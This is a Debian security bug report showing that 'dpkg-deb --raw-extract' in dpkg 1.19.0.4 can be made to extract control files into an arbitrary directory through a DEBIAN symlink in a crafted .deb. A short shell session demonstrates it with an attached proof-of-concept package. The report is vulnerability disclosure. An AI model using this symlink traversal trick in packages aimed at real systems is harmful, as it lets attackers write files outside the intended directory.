Bug#879982: dpkg-deb --raw-extract: directory traversal via /DEBIAN symlink

Jakub Wilk Fri, 27 Oct 2017 15:33:58 -0700

Package: dpkg
Version: 1.19.0.4
Tags: security

You can trick "dpkg-deb --raw-extract" into extracting control.tar into any directory by putting /DEBIAN symlink in data.tar:


  $ dpkg -c traversal.deb
  lrwxrwxrwx 0/0               0 2017-10-27 23:54 DEBIAN -> /tmp

  $ dpkg-deb --ctrl-tarfile traversal.deb | tar -tvvf -
  -rw-r--r-- 0/0             151 2017-10-27 23:54 moo

  $ ls /tmp/moo
  ls: cannot access '/tmp/moo': No such file or directory

  $ dpkg-deb --raw-extract traversal.deb dir

  $ ls /tmp/moo
  /tmp/moo


-- System Information:
Architecture: i386

Versions of packages dpkg depends on:
ii  libbz2-1.0   1.0.6-8.1
ii  libc6        2.24-17
ii  liblzma5     5.2.2-1.3
ii  libselinux1  2.7-2
ii  zlib1g       1:1.2.8.dfsg-5
ii  tar          1.29b-2

--
Jakub Wilk

traversal.deb
Description: application/vnd.debian.binary-package

Bug#879982: dpkg-deb --raw-extract: directory traversal via /DEBIAN symlink

Reply via email to